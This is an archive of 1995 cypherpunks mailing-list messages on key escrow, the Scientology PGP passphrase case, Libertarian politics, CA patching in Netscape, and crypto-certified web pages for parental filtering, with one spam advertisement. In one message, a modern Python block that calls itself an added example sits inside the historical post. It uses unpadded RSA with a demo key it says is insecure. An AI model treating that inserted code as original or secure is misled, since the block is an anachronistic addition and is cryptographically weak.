published the first issue of the Journal of Law & Technology on the 
web.  It appears that they got my name, and address, from the web 
(both are displayed in the "Contacting the Journal" page).

I haven't had much time to read the book, but my recollection is that 
it is somewhat misguided in its analysis of privacy online.  Its 
historical perspective is fairly thorough, however.

--Rick Klau

---------
Richard P. Klau (3L)  //  klaurich@uofrlaw.urich.edu
Editor in Chief, Richmond Journal of Law & Technology
         http://www.urich.edu/~jolt/
         




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Sep 95 17:53:26 PDT
To: cypherpunks@toad.com
Subject: Libertarian Party and Crypto Anarchy
Message-ID: <ac76325b3d021004c1d9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I've changed the name of this thread. Somehow the title "Re: [NOISE]Re:
ECPA (Was: University logging mail to anon.penet.fi)" did not quite cut it.
I really wish folks would take the effort to change thread names when
appropriate.]


At 11:24 PM 9/8/95, Jim Ray wrote:

>They were in the minority in my party, even *before* the OK City
>mass-murder proved why we have such a pledge (to distance ourselves
>from those who would initiate violence).

As a point of reference, I usually vote Libertarian, even though it's
pointless. And I'm even registered "Libertarian Party," which matters even
less. (I've also changed my registration to Democratic or Republican when I
wanted to influence in some tiny way their primaries...as when I switched
to Democrat so as to vote for Jerry Brown, mainly because of his flat tax
proposal.)

But I've never signed the LP "pledge" as I dislike such blanket pledges.
And I dislike the notion of pledges per se.

So, I'm registered to the Libertarian Party, and usually vote Libertarian.
But I am not allowed to be a dues-paying member and get their worthless
newsletters, which suits me fine.

(Anybody prepared to bomb a government building is not going to balk at
signing such a pledge, so it does little good. Personally, I think the
"pledge" is profoundly anti-libertarian, and smacks of McCarthyism.)

Your mileage may vary. And I place a lot more faith in crypto activism
having an effect than in the LP having an effect. Crypto and crypto
anarchist ideas are already creeping into the LP belief system, as
reflected in articles in "Reason" and "Liberty." And David Friedman (author
of "The Machinery of Freedom," and son of Milton) gave a talk recently in
L.A. entitled "Crypto Anarchy and the State."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Fri, 8 Sep 95 15:19:00 PDT
To: jya@pipeline.com
Subject: Re: Key Escrow Papers
In-Reply-To: <199509082016.NAA22536@comsec.com>
Message-ID: <9509082216.AA12075@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: John Young <jya@pipeline.com>
>Date: Thu, 7 Sep 1995 20:55:49 -0400

>   Note 1: It was Michael Nelson of the White House who said
>   that the reason to maintain the 64-bit limit for export was
>   because the key escrow methodology had not yet been proven
>   reliable and that the security agencies insisted on the
>   relatively weak system in case key escrow failed.

Clint Brooks of NSA repeated this assertion, at least once.  He said it
during the August 17, 1995 meeting as well.

I find this interesting, not least as a violation of security.  This
amounts to an open declaration that NSA can break through 64-bit keys.

Could it be that NSA was miffed at being upstaged in the announcement of
breaking through a 40-bit key and wanted to up the ante? .... :-)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 15:25:49 PDT
To: pfarrell@netcom.com
Subject: Re: Day 2, nist GAK meeting
In-Reply-To: <199509082025.NAA22581@comsec.com>
Message-ID: <9509082219.AA12139@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 8 Sep 1995 06:36:00 -0700
>From: pfarrell@netcom.com (Pat Farrell)

>Penny Brummitt of NSA was to talk about Clipper's key escrow agents,
>but called in sick. I didn't catch the name of the replacement.

It was Jan Manning.

He's NSA's person designing the Law Enforcement decrypt box and possibly
other related equipment for the Clipper program.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 8 Sep 95 10:23:40 PDT
To: Tom Rollins <trollins@hns.com>
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <Pine.3.89.9509081833.A4038-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Sep 1995, Tom Rollins wrote:

> I took a look at the FACTNet web page.  There is a file encrypted with
> PGP using the "-c" option.  They are asking for people to help guess
> the Pass Phrase.  Why would anyone bother if they had no clue that the
> file contained anything 'interesting'.

I can only assume one of two things - either this is a joke, as the
decrypted contents are nothing special as far as I can see (though
'interesting' in a sense), or that someone is very, very clever and
managed to hide two different messages in there with different
passphrases.

> If this is the file that the Co$ is trying to crack, then what
> is being asked for is a pass phrase that can be handed to the Co$ that
> will pass the PGP valid key check and still not decrypt the data to
> anything useful.

If this is the file the Co$ want to crack, they're a) clearly 
cryptographically inept, and b) the joke's clearly on them 8-).. Any 
hacker worthy of the name ought to get the passphrase within three 
attempts (I got it first time).

Note for paranoids: Of course, this message may just be a ruse to put 
the Co$ off the scent ;-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janetdove@infosat.com (Janet Dove)
Date: Sat, 9 Sep 95 02:58:51 PDT
Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles
Message-ID: <janetdove-0809951833220001@pm1-49.ixc.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi fellow 'netters,

My name is Janet Dove and I recently started using a magazine subscription
club in the USA that has a FREE 1 yr. magazine subscription deal with your
first paid order- and I have been very pleased with them.    They have
over 1,500 different USA titles that they can ship to any country on a
subscription basis.   As for computer magazines from the USA, they have more of
a selection than I ever knew even existed.  They have magazines for most
every area of interest in their list of 1,500 titles.

Within the USA, for their USA members, they are cheaper than all their
competitors and even the publishers themselves.  This is their price
guarantee.

Overseas, on the average, they are generally around one-fourth to one-half
of what the newsstands overseas charge locally for USA magazines.  On some
titles they are as little as one-tenth of what the newsstands charge.  They
feel that magazines should not be a luxury overseas.   In the USA, people
buy magazines and then toss them after reading them for just a few minutes
or hours.  They are so cheap in the USA!   Well, this company would like
to make it the same way for their overseas members.  They are also cheaper
than all their competitors in the USA and overseas, including the
publishers themselves!   This is their price guarantee.  Around one-half
their business comes from overseas, so they are very patient with new
members who only speak limited English as a 2nd language.

Their prices are so cheap because they deal direct with each publisher and
cut-out all the middlemen.


They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and
juicy) !)...if you completely fill out the form below.  It has lists of
all the freebies, lists of all the titles they sell, titles broken down by
categories and detailed descriptions on nearly 1000 of the titles that
they sell.

Please do not email me as I am just a happy customer and a *busy*
student.  I don't have time to even complete my thesis in time, let alone
run my part-time software business!  Email them directly at:      
munish@grfn.org



*------------cut here-----------------------------------------------*
REQUEST FOR MORE INFO:  please copy this section only and email to:
                                        munish@grfn.org

            (sorry, but incomplete forms *cannot* be acknowledged)

Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newsstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"):
(1. 22-part email message;    2.  attached file by email)

{{{Note-  22-part email can be received by anyone with any computer.
Attached file format may not be for you:  it is sent as an uncompressed
400K file formatted in Microsoft Word text only format, on a Mac;  if you
don't use Microsoft Word on a Mac - you will have to know how to convert
into a usable text format.  We cannot help you with this.   If in doubt,
we suggest you go with the universally acceptable 22-part email message. 
You can always manually spend a few minutes pasting the parts into one
whole.}}}

If you saw this on a newsgroup, which newsgroup did you see it on?:

How did you hear about us (name of person who referred you or the area of
the internet that you saw us mentioned in):   Janet Dove 
090895BGV
*------------cut here-----------------------------------------------*



They guarantee to beat all their competitors' prices. Sometimes they are
less than half of the next best deal I have been able to find and other
times, just a little cheaper - but I have never found a lower rate yet. 
They assured me that if I ever do, they will beat it.  

They have been very helpful and helped me change my address from the USA
to Finland and then back again when I moved last month.  They are very
knowledgeable about addressing mags worldwide.

They have a deal where you can get a free 1 yr. sub to a new magazine from
a special list of over 300 popular titles published in the USA.   They
will give you this free 1 yr. sub when you place your first paid order
with them to a renewal or new subscription to any of the over 1,500
different popular USA titles they sell.  

They can arrange delivery to virtually any country and I think they have
clients in around 35 or 36 countries now.  Outside the USA there is a
charge for foreign postage and handling (on both paid and freebie subs)
that varies from magazine to magazine.  I have found their staff to be
very friendly and courteous.  They even helped me with an address change
when I moved from one country to another.
 
The owner thinks of his service as a "club" and his clients as "members"
(even though there is no extra fee to become a member - your first
purchase automatically makes you a member) and he is real picky about who
he accepts as a new member.   When he sets you up as a new member, he
himself calls you personally on the phone to explain how he works his
deal, or sometimes he has one of his assistants call.  He is kind of
quirky sometimes - he insists on setting up new members by phone so he can
say hi to everyone (I sure wouldn't want to have his phone bills!),  but
you can place future orders (after your first order) via E-mail.   

He has some really friendly young ladies working for him, who seem to know
just as much as he does about this magazine stuff.  If you live overseas,
he will even call you there, as long as you are interested, but I think he
still makes all his overseas calls on the weekends, I guess cause the long
distance rates are cheaper then.  

He only likes to take new members from referrals from satisfied existing
members and he does virtually no advertising.  When I got set-up, they had
a 2-3 week waiting list for new members to be called back so that they
could join up. (Once you are an existing member, they help you immediately
when you call. )  I think they are able to get back to prospective new
members  the same day or within a few days now, as they have increased
their staff.  I am not sure about this.........but if you email the above
form to them, that is the way to get started!

They will send you some FREE info. via E-mail (the short version (around
40K) of their catalogue, or if you request it the DELUXE LONG VERSION
(around 400K-big and juicy) !)...if you fill out the form near the top of
this message.

They then send you email  that outlines how his club works and the list of
free choices that you can choose from, as well as the entire list of what
he sells;  and then they will give you a quick (3-5 minute) friendly,
no-pressure no-obligation call to explain everything to you personally and
answer all your questions.

Once you get in, you'll love them. I do.  For more info,  just fill out
the form near the top of this message and email it to:      
munish@grfn.org


Sincerely,

Janet Dove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 8 Sep 95 17:45:44 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID: <TuNUwkkAsKkR084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tonight's local news included an interesting blurb about this case.
The judge refused to order Wollersheim to disclose his passphrase,
since the encrypted material comprised names of Co$ critics
who could then be targeted by the Church.  And the secret (and
copyright!) $criptures were read in court and excerpts broadcast
on the news, "close-captioned for the hearing-impaired."

All the entertaining stuff some of us have been reading on the
net was there:  aliens transported to earth, volcanoes h-bombed,
thetans...I laughed my ass off.  A bigtime win for PGP and encryption
generally, and a major PR debacle for the $cienos.

Kute Korrespondences Koda:

Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers.
I was cleaning out some paperwork and disk file archives recently,
and noticed that the ViaCrypt and Austin Code Works subpoenas were
dated Sept. 9, 1993.  Grady Ward of ACW has, of course, been a
major Co$ antagonist, making good use of PGP and the Cypherpunks
remailers.  The old message I found detailing these subpoenas was
from this list's sometime visionary, L. Detweiler.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 09:48:43 PDT
To: cypherpunks@toad.com
Subject: Info Warthogs
Message-ID: <199509081648.SAA08525@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Future Information Warfare Study Available


San Francisco, Sept. 6, 1995 -- Computer Security
Institute's "Special Report on Information Warfare"
describes how war might be fought in the 21st century.
The report will appear in the fall issue of the Computer
Security Journal, but is available now on request.


Patrice Rapalus, director of Computer Security Institute
(CSI), told Newsbytes, "In recent weeks, mass media
organizations such as Time Magazine, the Washington Post,
and National Public Radio have done stories on
information warfare. This report is a timely,
comprehensive and practical study on information warfare
and its impact on our future."


The report defines information warfare in contrast to
simple computer crime, "A computer crime is an act that
violates a law. It could be specifically targeted. It
could be isolated, or it could be one element of an
overall plan of attack. The conduct of information
warfare, in contrast, is never random or isolated (and
may not even violate a law). The term implies a concerted
effort to utilize information as a weapon with which to
wage war, whether on an actual battlefield or in
economic, political, or social arenas."


Four aspects of information warfare are listed in the
report: the electronic battlefield; infrastructure
attacks; industrial espionage; and personal privacy
attacks.


"It is important to understand that the term 'information
warfare' originated in the military and in its purest
sense refers to the grim and dangerous business of
real...country shattering war,"  says the report.


Computer Security Institute is located in San Francisco,
California, and is a wholly owned subsidiary of Miller
Freeman Publishing. Miller Freeman publishes over fifty
trade magazines including Dr. Dobbs Journal, Unix Review,
and LAN Magazine.


Computer Security Institute publishes, along with random
studies like the "Special Report on Information Warfare,"
a monthly newsletter, a semi-annual Journal, an annual
Buyers Guide, and an on-line bulletin board.


To obtain an advance copy of "Special Report on
Information Warfare," call 415-905-2310.

------


"Snooper" Software Digs Into Computers


San Francisco, Sept. 6, 1995 -- Vias & Associates Inc.
said it has introduced a new version of its "Snooper"
system information utility. The author of the software
said it is called Snooper because the program "snoops"
around the computer to report its configuration and
operating characteristics.


John Vias of Vias & Associates said his
company's program goes farther than other system
information programs, including Microsoft's MSD
(Microsoft System Detection), which is included in higher
versions of the company's DOS operating systems. "I think
Snooper is about the most accurate system information
utility you can get," he said. "People say it's easy to
use. It takes just one keystroke to go from the main
screen to any other screen. It also has a built-in editor
for 'autoexec' and 'config' files."


In all, Snooper can detect more than 150 details about a
person's computer, including CMOS settings, hard drive
type and capacity, any installed Micro Channel cards,
fax-modems, memory types and amount available to the
user, and video memory and type.


Snooper is targeted to all markets, Vias officials said,
including the average user, network administrators,
consultants, and technicians.


In the provided documentation is a wish list regarding
new features for future versions of Snooper, including
brand detection of additional non-Intel central
processing units (CPUs), detection of local bus cards and
tapes, and the ability to differentiate among different
types of hard drives.


Although Snooper can run in either DOS or Windows, Vias
said the program works best in the DOS environment. In
Windows, some of the software's reports must be disabled.
In addition, some of the test results may be in error or
unpredictable. Snooper requires an IBM PC or 100%
compatible machine, with at least 256 kilobytes (KB) of
RAM, a DOS with version 3.1 or higher, and some kind of
video card. Snooper retails for around $39, and is
available as both a full version and as shareware.


Vias also said he is working hard on a Windows 95 version
of Snooper. When tested the software on a Windows 95
machine running in DOS mode, no problems were
experienced. But running it in Windows mode made the
program very unpredictable.


-------


UK - PCMCIA Encryption Card Introduced


London, Sept. 5, 1995 -- PPCP, a PCMCIA (Personal
Computer Memory Card International Association)
specialist, has begun shipping the Session Key, a PCMCIA
Type II card from SCI Canada.


According to John Nolan, the company's managing director,
the card allows users to encrypt data on their PC hard
disk, as well as across serial port linked devices, such
as modems, using the DES algorithm. DES stands for Data
Encryption Standard, a US-originated high security
encryption system that is virtually unbreakable.


According to Nolan, the Session Key allows users to
protect their data on a selective basis. "Many of the
competing systems out there are only capable of
encrypting the user's entire hard disk. That obviously
protects the user's data, but if you forget your
password, you have serious problems," he explained.


"With the Session Key card, you create a new drive, the
'D' drive, to store the encrypted data. The card also
allows data to be transmitted by modem in DES format.
That allows a user maximum flexibility," he said.


When used to encrypt data on a user's hard disk, once the
Session Key is removed from the PCMCIA slot, all data on
the disk that is encrypted is protected against
unauthorized access. The encrypted data cannot be read or
used without reinserting the UKP349 card.


Nolan said that SCI has developed a second-generation
version of the Session Key, which will be available later
this year. "That version will use RSA encryption
techniques, as well as Triple DES and a whole host of other
encryption systems," he said.


One of the problems with encryption devices like the
Session Key is the fact that the US Government currently
bans the export of certain types of encryption
technologies, as well as restricts the sale of many
technologies to "known parties."


According to Nolan, this approval system can cause the
company a few administrative problems. "We need to find
out who is the actual end-user and pass their details
back to SCI. My understanding is that the vetting is then
carried out at a government level in Canada or the US,"
he said. He added that, apart from a short delay,
typically a week or so before the card can be shipped to
the customer, there is usually no problem.


Reader Contact: PPCP, tel +44-181-893-2277, fax
+44-181-893-1182, Internet e-mail
100302.1470@compuserve.com/PPCP950905/PHOTO)

------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 8 Sep 95 10:02:18 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <v01510101ac75129c8e67@[193.74.217.3]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis Wrote:
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know,
>however, if the "dislike" is because government would have access under
>any circumstances or if the primary worry is that government will cheat
>and get access when most would agree that they shouldn't (either by the
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of
>non-LEA members of this list, would the escrow be acceptable??
>

Looking at it simply as a cryptosystem, I'd have to vote no, since the
security of the system can be "easily" (in a cryptographic sense)
compromised.

I feel safer knowing my privacy is protected by the laws of mathematics,
instead of the laws of the USA.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 8 Sep 95 16:24:58 PDT
To: cypherpunks@toad.com
Subject: [NOISE]Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <199509082321.TAA28363@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

>	Whatever do the workings of an hypothetical "libertarian"
>society have to do with the "Libertarian Party"?  Certainly, it would
>be nice if the latter were working towards the former, but the two are
>not the same.

So? (They are as close as we are going to get.)

>	I know of quite a few `l'ibertarians who strongly object to
>the `L'ibertarian Party pledge.

They were in the minority in my party, even *before* the OK City
mass-murder proved why we have such a pledge (to distance ourselves
from those who would initiate violence).
This reply, to a reply to the ENTIRE list, would probably have been
better sent privately. The reason that I first sent to the whole
list was as much to encourage other posters to proofread their posts
as for any libertarian political purpose.
<Wishing that this thread would end>

PS
Interesting letter to the editor RE: Jerry Garcia in today's WSJ.<g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"As sensitive and broad-minded humans, we must never allow ourselves to
be in any way judgmental of the religious practices of other people,
even when these people clearly are raving space loons." -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 20:09:14 PDT
To: cypherpunks@toad.com
Subject: Re: Libertarian Party and Crypto Anarchy
Message-ID: <v01510102ac76b2730ba2@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote,
>And David Friedman (author
>of "The Machinery of Freedom," and son of Milton) gave a talk recently in
>L.A. entitled "Crypto Anarchy and the State."

Is text available for that talk?

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 8 Sep 95 21:55:45 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: GAK Hacks
In-Reply-To: <199509081611.JAA05733@jobe.shell.portal.com>
Message-ID: <199509090450.VAA19757@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One would be to create a patcher which would let you change the set of
> certificate authorities accepted by the browser.  Currently the browser
> accepts at least one (an internal Netscape test CA) which is not needed
> by end users.  Maybe its public key could be statically overwritten by
> the patch program with the public key of the replacement CA.  This sounds
> simple and safe.  The patch program can confirm that the data being
> changed matches the test CA.

	Where is the public key for the test CA available? Seems
pretty trivial to take those bits and just do a bit compare against
your netscape binary to find out where the key is stored within the
binary.. 

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Fri, 8 Sep 95 21:07:44 PDT
To: cypherpunks@toad.com
Subject: Re: Web Exon A-rate
Message-ID: <v01510103ac76b61be743@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Somebody passed this along:
>WS Journal, Sept. 8, 1995.
>
>Cleaning the Web: Companies to Seek Pornography Blocker
>
>Array of Technology Firms Will Join in Effort to Let
>Parents Screen the Internet
>
>By Jared Sandberg
[snip]

This is a good idea.  And maybe cryptography can get involved--see below.

As a parent it is my responsibility to control what comes into the house
and to determine what limited view of the net my kids see.  The screening
software to do this could be in my home or part of a service of my service
provider.

A few companies have some simple products for doing this.  Most are
discouraged by threats from congress to reduce the market need.  Most
products use a simple red list to block access according to literature sent
me.  Some look for key words.

Normally, I would say that it is very premature for standards work.  It
would be good to see more ideas tried.  The Exon threats probably do not
allow this, so I see this news as a good thing.

One place to start is the web.

Depending on the kid's age and other factors I would want to have different
limitations on what the kid sees.  Older kids might just get warnings.  I
would like--for the little ones--to limit the view to some combination of
sites listed on green lists.  The view for slightly older kids might use
red lists to exclude sites instead.  (I really would want to create some
logical combination of lists for each kid.)  Organizations can compete for
the list market.  I might use these in whatever combination I like and
also add my own.  It is important to note that the kinds of things I would
like to screen out or in might be different from what the next person would
like to screen out or in.  (I put little faith in content screening.)

The problem might be in getting huge lists every week.  And pages that
seemed fine once could have changed.  Current red list subscriptions are
expensive--it is easier to keep kids off the computer.

>>>>>> the part that mentions cryptography >>>>>
As an alternative to green lists consumer organizations and do-gooder
organizations might certify pages.  These might be virtual green lists.
Each web page would have the cert built in--perhaps in comments to allow
most viewers to work.  Instead of checking a list in this case, the
screening software would ask the page to verify itself.

If the cert was PGP based, then every home doing this would have to have
PGP.  The screening product could use PGP.  Perhaps PGP would be slow.
There might be some way to check signatures that is faster and does not
have patent limitations.  It would be nice if it was possible for the
browser to see the first screenful without waiting for the screener to see
the entire page.

Only those that especially want to make their sites available to kids of
picky parents would get the pages certified.  Maybe just sending in e$3
would do it.  Or e$50 to get to the head of the list.

In whatever standards that come about, it is important that only those
involved in the screening process pay the price ($, delays).  Everybody
else should be able to carry on.

I do worry that some quick standards would be put into place and that
innovation in this area would then become arrested.

Dar


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================
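
The certified-page idea in the message above (a certifier's signature carried in an HTML comment and checked by the screening software, combined with per-child green and red lists), as an added example that is not part of the original post. The comment format, function names, host names and profiles are hypothetical, and it uses textbook RSA over SHA-256 with a constructed demo key rather than PGP's own signature format.

```python
import hashlib
import re

# Constructed demo key pair for one hypothetical certifier. P and Q are the
# Mersenne primes 2^521-1 and 2^607-1, used only because they can be written
# inline; a special-form modulus like this is NOT a secure key.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent, held by the certifier

# Hypothetical comment format carrying the certificate at the top of the page.
CERT_RE = re.compile(
    r"<!--\s*page-cert\s+certifier=(\S+)\s+sig=([0-9a-f]+)\s*-->\n?")


def _digest(body):
    """SHA-256 of the page body as an integer (textbook RSA, no padding)."""
    return int.from_bytes(hashlib.sha256(body.encode("utf-8")).digest(), "big")


def certify(body, certifier, d=D, n=N):
    """Certifier side: sign the body and prepend the cert as an HTML comment."""
    sig = pow(_digest(body), d, n)
    return "<!-- page-cert certifier=%s sig=%x -->\n%s" % (certifier, sig, body)


def screen(page, trusted):
    """Screener side. trusted maps certifier name -> (e, n) public key.

    Returns (allowed, reason). Everything after the cert comment is covered
    by the signature, so a page edited after certification fails closed.
    """
    m = CERT_RE.match(page)
    if m is None:
        return False, "no certificate"
    name, sig = m.group(1), int(m.group(2), 16)
    if name not in trusted:
        return False, "untrusted certifier"
    e, n = trusted[name]
    if sig >= n or pow(sig, e, n) != _digest(page[m.end():]):
        return False, "bad signature"
    return True, "certified by " + name


def allowed(profile, host, page, trusted):
    """Combine lists per child: the red list always blocks; in 'green' mode a
    host must be green-listed or the page must carry a valid certificate."""
    if host in profile.get("red", ()):
        return False
    if profile["mode"] == "green":
        return host in profile.get("green", ()) or screen(page, trusted)[0]
    return True  # 'red' mode: everything not red-listed is visible


# Constructed sample data.
TRUSTED = {"kidsafe.example": (E, N)}
BODY = "<html><body><h1>Dinosaurs</h1></body></html>\n"
PAGE = certify(BODY, "kidsafe.example")
TAMPERED = PAGE.replace("Dinosaurs", "Something else")
YOUNG = {"mode": "green", "green": {"library.example"}, "red": set()}
OLDER = {"mode": "red", "red": {"blocked.example"}}

if __name__ == "__main__":
    for label, page in [("certified", PAGE), ("tampered", TAMPERED),
                        ("uncertified", BODY)]:
        print(label, screen(page, TRUSTED))
```

Because the signature covers the whole body, the screener has to read the entire page before it can decide, which is the first-screenful delay the message raises.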






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael <mike@uac.net>
Date: Fri, 8 Sep 95 20:58:55 PDT
To: dl@hplyot.obspm.fr
Subject: Re: [NOISE/Fun] some 'special' primes
In-Reply-To: <9509090332.AA06578@hplyot.obspm.fr>
Message-ID: <199509090358.XAA18311@mail1.uac.net>
MIME-Version: 1.0
Content-Type: text/plain



> A bit more fun : German : 811 (dunno how to write it, but it starts
> with an "a")

acht hundert uenf  (I think)


--Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 9 Sep 95 00:44:52 PDT
To: cypherpunks@toad.com
Subject: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509090742.AA15129@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:

> > Modemac writes:
> >  Mr. Wollersheim has stated that he will go to jail before he reveals
> >  his encryption key.
> [...snip...]
> >  Call this one: BIG WIN FOR PGP!
> 
> Could this be it?  The test case for forced key disclosure?  The  
> Scientologists seem very determined and already have a grudge against  
> Wollersheim (according to a web page I saw Co$ owes him several million from  
> a settlement).  Has Co$ filed against Wollersheim over this yet?
> 
> If this does go to court and forcing Wollersheim to reveal the key becomes a  
> central issue, is this the test case "we" want?  Is this a "BIG WIN FOR PGP!"  
> or not?

Well, since it's (apparently) a civil case against Wollersheim, the 
potential Fifth Amendment self-incrimination issues may be murkier, so 
this may not be a good test case for the criminal context. In federal civil
trials, material reasonably likely to lead to the discovery of admissible
evidence is discoverable unless there's an applicable privilege - this
means that in a civil case, a defendant may be forced to hand over material
likely to expose them to liability. (The Fifth Amendment privilege against
criminal self-incrimination still applies).

I'm not sure that key disclosure will even be necessary - the Church
(or whatever annoying tentacle of it is suing Wollersheim) is entitled
to, for example, "a copy of . . . all documents, data compilations, and
tangible things in the possession, custody, or control of the party
that are relevant to disputed facts alleged with particularity in 
the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why
Wollersheim couldn't comply with the discovery rules by providing 
plaintext copies of all relevant information, unless for some reason
the passphrase is itself relevant.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 8 Sep 95 16:08:22 PDT
To: dsc@swcp.com (Dar Scott)
Subject: Re: Cyphernomicon
In-Reply-To: <v01510103ac6ed8b35fa2@[198.59.115.136]>
Message-ID: <9509082307.AA05637@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dar Scott writes:
[...]
 > Here is a summary of what I learned:
[...]
 >   FTP sites:
 >      ftp.netcom.com/pub/tc/tcmay/CP-FAQ
 >      The original.  "crowded"  (I couldn't open an FTP port.)

Got it from there, anyone feel free to fetch :
ftp://hplyot.obspm.fr/net/CP-FAQ.gz

 >      ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz
 >      ftp.goblin.punk.net/pub/docs/cypherfq.zip
 >      28.8 bps modem, newline=CR, but .zip will change to newline=CRLF
 >      About 432Kbytes.
 >      (On PPP@14.4 it took me 6+ minutes to get it.)
 >      "until someone posts it on a site with higher bandwidth"
